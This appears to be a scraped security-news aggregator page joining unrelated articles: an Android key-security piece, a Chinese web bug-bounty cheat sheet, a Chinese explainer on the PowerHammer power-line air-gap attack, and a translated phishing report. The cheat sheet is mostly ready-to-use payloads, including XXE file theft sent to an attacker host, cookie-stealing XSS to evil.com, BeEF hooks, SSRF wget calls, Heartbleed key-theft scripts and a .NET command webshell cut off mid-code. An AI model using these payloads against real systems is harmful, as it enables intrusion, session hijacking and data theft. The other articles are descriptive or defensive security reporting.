From a technical standpoint, when a remote server encrypts a secure key using a public wrapping key from the user’s device, Secure Key Import allows it to also contain a description of the ways the imported key is allowed to be used, and it ensures that a key can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key.

Because the keys are encrypted in transit and remain opaque to the application and operating system, this prevents them from intercepted or extracted from memory and then used to steal data.

Android Developers in the Hot Seat

Making additional measures available to developers to help them lock down their applications to prevent data leaking or the possibility of data exfiltration is timely; Android developers have been in the hot seat over sloppy data sequestration practices of late.

More specifically, in the last few months, several possibilities for taking advantage of cross-process information leakage came to light.

One main problem area for developers has to do with inter-process communication. While applications on Android are usually segregated by the OS from each other and from the OS itself, there are still mechanisms for sharing information between them when needed. One of those mechanisms is the use of what Android calls “intents.”

An application or the OS itself can send an “intent” message out, which is broadcast system-wide and can be listened to by other applications. Without proper access restrictions and permissions put in place around these intents, it’s possible for malicious applications to intercept information that it shouldn’t have access to. This “API-breaking” issue was shown to open the door to a range of nefarious activity, including rogue location tracking and local WiFi network attacks .

Another cross-process problem was revealed at DEFCON , where researchers demonstrated that sloppy Android developers not following security guidelines for external storage could allow an attacker to corrupt data, steal sensitive information or even take control of a mobile phone.

Android’s external storage mechanism is shared across the OS, because it’s designed to enable apps to transfer data from one app to another. So, if a user takes a picture and then wants to send it to someone using a messaging app, the external storage is the platform that allows this to happen.

If developers don’t lock down the type of data that goes to external storage, a bad actor could hijack the communications between privileged apps and the device disk, bypassing sandbox protections to gain access to app functions and potentially wreak havoc. This was dubbed the “man in the disk” issue and was quickly found to affect a range of apps, including Fortnite’s Android app .

Web Fuzz

$
0
0

发现post请求的接口的时候,可以这样试试:

<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <methodCall><methodName>&test;</methodName></methodCall>

如果发现了一个错误:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test "nice string bro">] > <methodCall><methodName>&test;</methodName></methodCall>

说明能够解析,试试读文件:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&test;</methodName></methodCall>

或者用php伪协议:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">] > <methodCall><methodName>&test;</methodName></methodCall>

得到的结果再base64解码即可。

webgoat8 测试方法

试一试是否可以添加实体的评论:

<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <comment><text>&test;</text></comment>

可以的话,试试file:

<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <comment><text>&test;</text></comment> MUTILLIDAE

要获取mutillidae上的文件,要在form表单提交的过程中使用测试的payload:

<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>

或者把xml版本忽略掉:

<!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>

以及上面提到的php流:

<!DOCTYPE a [<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">] > <methodCall><methodName>&TEST;</methodName></methodCall> OUT OF BAND 基础测试 copy the payload to clipboard <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]><foo>&xxe;</foo>

看看是否发送了请求


Web Fuzz

成功后,再利用其他payload

读文件

wing.xml

<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/lsb-release"> <!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd"> %dtd; ]> <data>&send;</data>

vps->evil.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;

host in dtd:

python -m SimpleHTTPServer 8000

使用FTP读文件

evil.xml

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>

将dtd文件放在VPS上:

<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">

ruby利用脚本:

require 'socket' ftp_server = TCPServer.new 2121 http_server = TCPServer.new 8088 log = File.open( "xxe-ftp.log", "a") payload = '<!ENTITY % asd SYSTEM "file:///etc/passwd">' Thread.start do loop do Thread.start(http_server.accept) do |http_client| puts "HTTP. New client connected" loop { req = http_client.gets() break if req.nil? if req.start_with? "GET" http_client.puts("HTTP/1.1 200 OK\r\nContent-length: #{payload.length}\r\n\r\n#{payload}") end puts req } puts "HTTP. Connection closed" end end end Thread.start do loop do Thread.start(ftp_server.accept) do |ftp_client| puts "FTP. New client connected" ftp_client.puts("220 xxe-ftp-server") loop { req = ftp_client.gets() break if req.nil? puts "< "+req log.write "get req: #{req.inspect}\n" if req.include? "LIST" ftp_client.puts("drwxrwxrwx 1 owner group 1 Feb 21 04:37 test") ftp_client.puts("150 Opening BINARY mode data connection for /bin/ls") ftp_client.puts("226 Transfer complete.") elsif req.include? "USER" ftp_client.puts("331 password please - version check") elsif req.include? "PORT" puts "! PORT received" puts "> 200 PORT command ok" ftp_client.puts("200 PORT command ok") else puts "> 230 more data please!" ftp_client.puts("230 more data please!") end } puts "FTP. Connection closed" end end end loop do sleep(10000) end

fuzz

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE-Fuzzing.txt

XSS

对于asp的站点,我们用unicode编码尖括号,适用于存储型XSS:

'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'

文件上传的XSS

发现上传点的时候,可以试试用payload作为文件名:

<img src=x onerror=alert('XSS')>.png

or:

"><img src=x onerror=alert('XSS')>.png

or:

"><svg onmouseover=alert(1)>.svg

SVG

stuff.svg

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert('XSS!'); </script> </svg>

XML

<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>

CSP BYPASS

script-src self: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

常用的payload svg/onload '-alert(1)-' eval(atob('YWxlcnQoMSk=')) <iMg SrC=x OnErRoR=alert(1)> <div onmouseover="alert('XSS');">
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> - ```""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e

AUTH CRED

遇到http-only的时候:

使用钓鱼的基本身份验证获取其凭据

注册一个和目标类似的域名 https://github.com/ryhanson/phishery 编译然后运行 设置payload―- <img/src/onerror=document.location="https://evil.com/"> 等待目标上线

可还行


Web Fuzz
偷Cookie

<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>

Blacklist bypass:

过滤了 //,:,",<和>

btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')

payload:

eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))

另外一个:

<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>

比较不错的一个payload:

<svg onload=fetch("//attacker/r.php?="%2Bcookie)>

nc 监听:

nc -lvp 8090

测试session劫持

利用burp重放功能进行测试。

看不同cookie会有什么变化。

FILTER BYPASS RESOURCES

收集到的payload:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/ https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code https://brutelogic.com.br/blog/avoiding-xss-detection/ https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec

基于POST的XSS

如果遇到无法将基于POST的XSS转换为GET请求的情况(可能目标服务器上禁用了GET请求),试试CSRF。

DOM XSS

<target.com>/#<img/src/onerror=alert("XSS")>

beef的hook,urlencode

<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>

#<img/src="1"/onerror=alert(1)>

#><img src=x onerror=prompt(1);>

这些站点有大量的xss payload

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection https://zseano.com/tutorials/4.html https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html http://www.xss-payloads.com/payloads-list.html?a#category=all

payload生成:

xssor.io http://www.jsfuck.com/ https://github.com/aemkei/jsfuck https://convert.town/ascii-to-text http://jdstiles.com/java/cct.html

SSRF

在可以控制url参数的情况下,只要不重定向,就可以测试一下SSRF。

Webhooks, PDF 生成, 文档解析, 文件上传这些地方都可以重点关注一下。

PS: https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF

想办法探测内网资产: http://internal-server:22/notarealfile.txt

更换端口,查看回显,判断端口的开放。

没有回显的情况下,按照响应时间判断,以及DNSLOG,这玩意burp自带的也好用的。

根据我的经验,一些组件只能使用某些端口,例如80,8080,443等。最好对这些端口进行测试。

如果你的payload中有路径,最好带上&,#

http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000& http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#

这篇文章对SOP和CORS以及SSRF都有很好的讲解:https//www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/

Bug Bounty Write-ups:

https://hackerone.com/reports/115748 https://hackerone.com/reports/301924 https://www.sxcurity.pro/hackertarget/ http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/

SQL注入

使用SQLMap在PUT REST Params中测试SQLi:

1. 使用 *标记Vulnerable参数 2. 复制请求并将其粘贴到文件中。 3. 用sqlmap运行: sqlmap -r <file with request> -vvvv

备忘录: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

可以试试双编码输入。

会话固定

快速检查的方法,可用于确定会话固定漏洞是否是网站上的问题:

转到登录页面,观察未经身份验证的用户拥有的会话ID。 登录该站点。进入后,观察用户拥有的会话ID。如果会话ID与用户进行身份验证之前由站点提供的会话ID匹配,那么存在会话固定漏洞。

CSRF

一些绕过技术,即使有CSRF Token:

https://zseano.com/tutorials/5.html

csrf和reset api:

<html> <script> function jsonreq() { var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST","https://target.com/api/endpoint", true); xmlhttp.setRequestHeader("Content-Type","text/plain"); //xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xmlhttp.withCredentials = true; xmlhttp.send(JSON.stringify({"test":"x"})); } jsonreq(); </script> </html>

案例:

https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b http://c0rni3sm.blogspot.com/2018/01/1800-in-less-than-hour.html

CSRF TO REDECT XSS

<html> <body> <p>Please wait... ;)</p> <script> let host = 'http://target.com' let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e' let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E' function submitRequest() { var req = new XMLHttpRequest(); req.open(<CSRF components, which can easily be copied from Burp's POC generator>); req.setRequestHeader("Accept", "*\/*"); req.withCredentials = true; req.onreadystatechange = function () { if (req.readyState === 4) { executeXSS(); } } req.send(); } function executeXSS() { window.location.assign(host+'<URI with XSS>'+alert_payload); } submitRequest(); </script> </body> </html>

文件上传漏洞

在OS X上创建测试10g文件(对于测试文件上载限制很有用):

mkfile -n 10g temp_10GB_file

无限制的文件上传

资源:

http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html

一些备忘录: https://github.com/jhaddix/tbhm

CORS配置错误

用于测试的POC:

<!DOCTYPE html> <html> <body> <center> <h2>CORS POC Exploit</h2> <div id="demo"> <button type="button" onclick="cors()">Exploit</button> </div> <script> function cors() { var req = new XMLHttpRequest(); req.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = this.responseText; // If you want to print something out after it finishes: //alert(req.getAllResponseHeaders()); //alert(localStorage.access_token); } }; // If you need to set a header (you probably won't): // req.setRequestHeader("header name", "value"); req.open("GET", "<site>", true); req.withCredentials = true; req.send(); } </script> </body> </html>

资源:

https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/ http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html https://www.youtube.com/watch?v=wgkj4ZgxI4c http://ejj.io/misconfigured-cors/ https://www.youtube.com/watch?v=lg31RYYG-T4 https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS https://w3c.github.io/webappsec-cors-for-developers/#cors http://gerionsecurity.com/2013/11/cors-attack-scenarios/ Using CORS misconfiguration to steal a CSRF Token: https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/

测试心脏出血漏洞

nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d

偷私钥

wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py echo "<target>:<port>" > targets.txt python heartbleed.py -f targets.txt -v -e

wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py python heartbleed-poc.py <target> -p <target port> | less

https://gist.github.com/bonsaiviking/10402038

https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py 重定向

http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html

重定向到beef:

<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

使用Burp中的Decoder将其编码为base-64,并将其传递给payload:

data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==

other:

http://;URL=javascript:alert('XSS') data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect

CRLF注入

当你看到请求的参数是这样:

http://inj.example.org/redirect.asp?origin=foo

回显是这样:

HTTP/1.1 302 Object moved Date: Mon, 07 Mar 2016 17:42:46 GMT Location: account.asp?origin=foo Connection: close Content-Length: 121 <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

尝试CRLF注射:

http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a

CRLF: %0d%0a

https://www.gracefulsecurity.com/http-header-injection/ https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) https://www.acunetix.com/websitesecurity/crlf-injection/ https://blog.innerht.ml/twitter-crlf-injection/

模板注入

您可以将一些代码放入jsfiddle以进行payload测试:

<html> <head> <meta charset="utf-8"> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script> </head> <body> <div ng-app> {{constructor.constructor('alert(1)')()}} </div> </body> </html>

http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

RCE

使用WEBSHELL上传(.NET)绕过AV:

这是一个示例,其中包含fuzzdb项目中的一个webshell:

<%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %> <script Language="c#" runat="server"> void Page_Load(object sender, EventArgs e) { } string executeIt(string arg) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c "+arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; } void cmdClick(object sender, System.EventArgs e) { Response.Write("<pre>"); Response.Write(Server.HtmlEncode(executeIt(txtArg.Text))); Response.Write("</pre>"); } </script> <HTML> <HEAD> <title>REALLY NICE</title> </HEAD> <body > <form id="cmd" method="post" runat="server"> <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox> <asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"

攻防最前线:通过电力线“搞定”物理隔离计算机

$
0
0
什么是电力线攻击技术?

电力线攻击技术是近些年出现的一种新型跨网络攻击技术。相比于传统的基于声、光、电磁、热等媒介的跨网络攻击技术,这种技术构建了一种新型的电(电流)隐蔽通道,攻击者可以通过交流电源线获取物理隔离网络中的信息,其隐蔽性更强,危害更大。在标准计算机上运行恶意软件,通过调节CPU工作负载在电力线上直接生成寄生信号,然后利用接收器等设备对电力线中的电流进行感知、还原等工作,完成信息窃取。


攻防最前线:通过电力线“搞定”物理隔离计算机

图 1 电力线攻击技术

这种攻击有什么独到之处?

电力线攻击技术主要有以下几个特点:

①隐蔽性强:恶意软件通过调节CPU工作负载线程在电力线上生成寄生信号,由于很多合法进程使用影响处理器工作负载的CPU密集型计算,因此这种攻击将传输线程注入这些合法进程中,从而绕过安全检测;

②攻击距离远:在目标计算机所处的主配电网络里,只要将一个小型非侵入式探头连接到计算机的供电电源线或该主配电网络中的主电器服务面板的电源线上即可进行信息获取;

③危害性大:恶意软件植入系统后,可为攻击者检索目标数据(文件、加密秘钥、令牌、用户密码等)。

这种攻击出现后,打破了人们对电源线的认知,用户在不知情的情况下,计算机中的敏感数据便随着为计算机工作而提供电力支持的电源线流向攻击者的“怀抱”。

电力线攻击技术的起源

来自以色列内盖夫本古里安大学的研究人员一直致力于通过旁路攻击从计算机窃取数据的研究。2018年其公开了最新的研究成果――PowerHammer,通过电源线传播的电流波动隐蔽地窃取高度敏感的数据,如图2所示为PowerHammer使用场景示意图。电力线本来是为电力设备进行供电所必须的一种线路,而电力线上产生的电流也会随着负载的功耗进行波动,正是由于这种特性,电力线的电流波动成为攻击者利用的目标。通过这种看似“正常”微弱变化从计算机中获取敏感信息的操作完全颠覆了人们对电力线的认知,也让人们开始重视电力线的安全防护工作。


攻防最前线:通过电力线“搞定”物理隔离计算机

图 2 PowerHammer使用场景示意图

电力线上的寄生信号

在标准计算机中,电流主要来自于从主电源向主板供电的电线。CPU是主板上最大的耗电源之一。现在的CPU具有高性能的特点,因此CPU的瞬时工作负载直接影响其功耗的动态变化。通过调节CPU的工作负载,可以控制其功耗,从而控制电力线中的电流。一般情况下,CPU满载工作时将消耗更多电流。故意启动和停止CPU工作负载可以以指定的频率在电源线上生成信号,并通过它调制成二进制数据。研究人员Mordechai Guri等人设计了寄生信号的生成模型:通过使用当前CPU可用的核心(其他进程未使用的核心),利用不同数量的核进行传输来控制电流消耗(CPU核满载时,电流消耗大;空载时,电流消耗小),从而控制载波的振幅,采用幅度调制使数据在信号幅度层面完成编码。当然,在信号的传输上为了更好区分二进制0/1编码,研究人员采用了FSK频移键控调制完成传输。如图3所示,一个4核心的CPU,其C1、C2两个核心用于其他进程,PowerHammer攻击技术则会利用C3、C4两个空闲的核心进行数据传输,如果CPU核心数越多,效果越明显,因为越多核心满载,所消耗的电流也就越大。


攻防最前线:通过电力线“搞定”物理隔离计算机

图 3 具有两个传输线程的CPU

攻击方式

PowerHammer电力线攻击技术共有两种攻击方式:

① Line level power-hammering:攻击者能够直接接触连接计算机电源的电力电缆。该攻击方式需要攻击者能够近距离接触目标,实施难度大。但由于可以近距离获取目标电力线电流消耗数据,受到的噪声干扰小,因此,该攻击方式可以支持更大的泄露数据速率。如图4所示a处为Line level power-hammering攻击。

② Phase level power-hammering:攻击者只能访问建筑物主配电网络中的主电器服务面板的电源线。该攻击方式下,攻击者无需近距离接触攻击目标,只需要在主电器服务面板一端即可完成信息获取操作。但由于电力线路过长,噪声也会有所增多,因此,该攻击方式只能支持较低的泄露数据速率。如图4所示b处为Phase level power-hammering攻击。

总之,越靠近目标,攻击者就可以以越快的速度接收目标数据。


攻防最前线:通过电力线“搞定”物理隔离计算机

图 4 PowerHammer攻击方式示意图

电力攻击危害评估

目前,针对物理隔离网络的攻击层出不穷,攻击方式多种多样,利用的物理介质也分布甚广,甚至还出现了将多种攻击方式组合以达到更高危害性的攻击技术。电力线攻击技术拥有得天独厚的隐蔽优势,因为其依托于现实世界中最普遍存在的、必要的传输介质――电。现今的计算机都要依托电力线对其供电,这种必要“设备”的存在为电力线攻击提供了“保障”。且在电力线攻击中,信号质量主要受电网中的噪声影响,受衰减影响较低。

研究结果表明,数据可以通过电力线从物理隔离的计算机中以1000 bit/s的速率进行Line level power-hammering攻击,以10 bit/s的速率进行Phase level power-hammering攻击。

可以预见,攻击者可能会利用电力线攻击技术对电网等基础设施发起攻击,也可能会与其他物理隔离环境下的攻击技术相结合发起级别更高、隐蔽性更高、破坏性更强的组合式攻击。

对策

电力线攻击利用方式巧妙,隐蔽性强,如何防范该种攻击技术也成为研究人员的研究热点之一。

①电力线检测:通过监视电力线上的电流来检测隐蔽传输。连续分析测量结果可以发现隐藏的传输模式或者其操作过程与标准行为间的偏差。不过,该种方式实施难度大,结果可能并不可靠。

②信号滤波:将电力线滤波器(EMI滤波器)连接到主配电柜中的电力线,以此来限制由隐蔽通道产生的信号。为了防止Line level power-hammering攻击,必须在每个电源插座上安装此类滤波器。但由于大多数用于限制传导发射的滤波器适用于更高的频率,而电力线攻击构建的隐蔽通道可以在低于24kHz的频率下进行传输,所以该攻击有时也可以轻而易举地绕过信号滤波。

③信号干扰:软件级干扰解决方案:在计算机系统中随机启动工作负载的后台进程,利用随机信号干扰恶意进程的传输,但这样会削弱系统性能,且在实时系统中不可行。硬件级干扰解决方案:利用专用电子元件在电力线上屏蔽由其他设备产生的信号,但对Line level power-hammering攻击无效。

④基于主机的检测:基于主机的入侵检测系统(HIDS)和基于主机的入侵防御系统(HIPS)会不断跟踪主机的运行过程,以便检测可疑行为。但由于许多合法进程也会使用影响处理器工作负载的密集型计算,因此该检测方法可能会产生较高的误报率。如果恶意软件将传输线程注入合法进程中,则可绕过安全检测。

综上,目前针对电力线攻击的对策还有很多问题,其发展任重道远,值得研究人员进一步关注。

总结

电力线攻击技术“巧妙”地利用了电力线本身的特点,以电为媒介,悄无声息地完成了对物理隔离计算机的信息窃取,危害性极大。在反恶意软件技术日益成熟的今天,利用硬件层和其他物理媒介的攻击技术日益发展,且随着恶意软件伪装技术的发展,攻击技术也从单一的恶意软件攻击和恶意硬件攻击转为恶意软硬件组合攻击的模式,电力线攻击技术就是这种组合的一个产物。其利用恶意软件控制计算机CPU负载的工作情况,并将这种调制信息的结果反映到电力线的电流消耗上,这种“软硬结合”的攻击模式隐蔽性高、破坏性强。

目前,虽然有一些针对电力线攻击的对策,但是都有其局限性。正所谓“道高一尺,魔高一丈”,目前的防御对策要么是以牺牲计算机性能为代价,要么是以高误报率为妥协来防御这种攻击,且二者均不能保证准确率。作为普通用户,要学会留意电脑中的不明进程,同时也要安装一些CPU核心监测软件,如发现有异常,立即终止相应进程。通过本文,也希望有更多研究人员能加入到研究相关防护技术的行列中,为信息安全保驾护航。

作者:薛亚楠 吕志强

声明:本文来自中国保密协会科学技术分会,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

$
0
0

【51CTO.com快译】电子邮件安全提供商Vade Secure跟踪分析了北美25个最常被网络钓鱼攻击冒充欺骗的品牌。在2018年第三季度报告中,共跟踪分析了86个品牌,这些品牌在该公司检测到的所有攻击中占了95%。


网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

总体而言,Vade Secure表示,第三季度网络钓鱼攻击增加了20.4%,头号目标是微软,其次是PayPal、Netflix、美国银行和富国银行。


网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

图1:最受青睐的网络钓鱼目标

基于云的服务和金融公司仍然是两个最容易中招的行业,微软是被觊觎的头号品牌,攻击者企图获取Office 365、One Drive和Azure的登录信息(又叫凭据)。

Vade Secure的报告称:“微软网络钓鱼攻击的主要目标是获取Office 365登录信息。只要有了一组登录信息,黑客就能访问存储在Office 365应用软件中的大量机密文件、数据和联系资料,比如SharePoint、OneDrive、Skype、Excel和CRM等软件。此外,黑客可以使用这些中招的Office 365帐户来发动另外的攻击,包括鱼叉式网络钓鱼、恶意软件以及越来越多针对同一家企业内其他用户的内部攻击。”


网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

图2:微软是最大的网络钓鱼目标

Office 365网络钓鱼电子邮件常常表示收件人的帐户已被暂停或禁用,然后提示收件人登录以解决问题。这些网络钓鱼表单与合法的Office 365几乎一模一样;通过营造一种紧迫感,攻击者希望受害者在输入登录信息时不那么警惕。


网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

图3:标题

紧随微软后面的是攻击者企图获取受害者钱财的PayPal网络钓鱼诡计和旨在窃取信用卡信息的Netflix诡计。

尤其值得关注的是,攻击者在哪几天发送大量的网络钓鱼电子邮件方面遵循一定的模式。报告声称,大多数与工作有关的攻击往往发生在工作周,而周二和周四是数量最多的两天。对于Netflix来说,最易中招的日子是周日,这天人们往往窝在家里看电视。


网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

图4:一周内每天的网络钓鱼数量

网络钓鱼攻击变得更具针对性

Vade Secure还注意到,攻击者开始减少某个特定的URL用于网络钓鱼活动中的次数。相反,攻击者在每封网络钓鱼电子邮件中使用唯一的URL以绕过邮件过滤器。

Vade Secure的报告继续说:“安全专业人员应更加担忧的是,网络钓鱼攻击变得越来越有针对性。当我们将网络钓鱼URL数量与我们的过滤器引擎阻止的网络钓鱼电子邮件数量关联起来,就发现每个URL发送的电子邮件数量在第三季度减少了64%以上。这表明黑客在较少的电子邮件中使用每个URL,以免被基于声誉的安全防御系统发现。事实上,我们已看到一些狡猾的网络钓鱼攻击,每封电子邮件都含有唯一的URL,实际上保证它们可以绕过传统的电子邮件安全工具。”

保护自己免受网络钓鱼攻击

随着网络钓鱼攻击变得越来越狡猾,它们也越来越难以被发现。攻击者现在使用云服务,能够用来自微软和Cloudflare等可信赖的知名公司的SSL证书为网络钓鱼表单增添可信度。那样表单在受害者看来貌似是真实的。

正如你从下面的网络钓鱼攻击中看到的那样,登录表单看起来正规,该网站在微软拥有的域中,页面也是安全的。在许多人看来,这似乎是正规的微软表单。实际上,攻击者将其表单托管在微软云服务上,以营造这种正规的感觉。


网络钓鱼报告显示,微软、PayPal和Netflix是首要目标

图5:Azure博客网络钓鱼表单

因此,在输入任何登录信息之前仔细检查网站始终很重要。如果URL看起来很奇怪,拼写错误,语法不正确,或者感觉哪里有异样,就不该输入任何帐户登录信息。如果你担心自己的帐户出现问题,请与管理员或公司本身联系。

原文标题:Phishing Report Shows Microsoft, Paypal, & Netflix as Top Targets,作者:Lawrence Abrams

【51CTO译稿,合作站点转载请注明原文译者和出处为51CTO.com】

零信任架构:网络安全新范式

$
0
0

作者:360企业安全集团副总裁 左英男

